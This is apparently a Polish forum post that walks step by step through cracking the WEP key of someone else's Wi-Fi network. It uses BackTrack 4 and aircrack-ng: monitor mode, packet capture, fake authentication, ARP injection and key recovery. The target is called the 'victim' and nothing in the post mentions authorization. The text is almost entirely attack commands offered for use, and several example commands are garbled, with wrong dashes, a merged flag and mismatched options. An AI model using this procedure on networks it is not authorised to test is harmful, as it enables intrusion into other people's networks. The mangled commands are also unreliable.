Pobierz BackTrack 4

Pierwszą rzeczą, jaką robimy to wchodzimy na link powyżej, pobieramy BackTrack 4 R2 Release ISO, wypalamy pobrany plik ISO na płycie DVD.
Płyta nagrana? Ok, idziemy dalej.
Uruchamiamy komputer ponownie, w BIOSie ustawiamy bootowanie z napędu CD (podobnie jakbyśmy chcieli zainstalowa Windowsa) - wybieramy pierwszą opcję, która nam się wyświetli w menu i zacznie się ładowanie plików systemu Linux BackTrack 4.
Jeżeli skończy się ładowanie ów plików, wpisujemy komendę startx i zatwierdzamy wciskając ENTER.
W następnym etapie uruchomi nam się system.
Klikamy PPM na pulpicie, wybieramy Run command i wpisujemy komendę airmon-ng, która sprawdzi nam dostępny interfejsy oraz jednocześnie uruchomi okno konsoli.

Kolejne etapy opiszę w podpunktach.
 • - Uruchamiamy interfejs w trybie monitoringu: airmon-ng start wlan0

  - Sprawdzamy dostępne AP i ich parametry: airodump-ng wlan0

  - Wciskamy kombinację klawiszy CTRL+C

  - Uruchamiamy na wybranym kanale: airodump-ng –c [nr_kanalu] –w [nazwa pliku] - -bssid [bssid_ap] wlan0 - przykład:
  airodump-ng -c6 -w NAZWASIECI--00:11:22:33:44:55 wlan0

  - Otwieramy nowe okno konsoli

  - Uwierzytelniamy się AP: aireplay-ng -1 0 –a [bssid] –h 00:11:22:33:44:55 (opcjonalnie –e [essid]) wlan0 - przykład:
  aireplay-ng -10 -a 00:11:22:33:44:55 -h 00:11:22:33:44:55 wlan0 - tam, gdzie jest zaznaczone na niebiesko, tam wpisujecie swoje BSSID, na czerwono BSSID ofiary.

  - Uruchamiamy wstrzykiwanie pakietów: aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 wlan0 - przykład:
  aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 wlan0 - tam, gdzie jest zaznaczone na niebiesko, tam wpisujecie swoje BSSID, na czerwono BSSID ofiary.

  - Przy przy 15-20 tys IVS (czyt. daty) możemy przystepować do ataku.
  - Otwieramy nowe okno konsoli.

  - Łamiemy hasło: aircrack-ng –n 64 –b [bssid] [nazwa pliku].cap (to nazwa pliku w którym są zebrane IVS) - przykład:
  aircrack-ng -n 64 -b 00:11:22:33:44:55 NAZWASIECI--00:11:22:33:44:55-01.cap

Gotowe! :-)
Życzę powodzenia.

- oczywiście zakaz kopiowania bez uzyskanej zgody na inne fora/strony.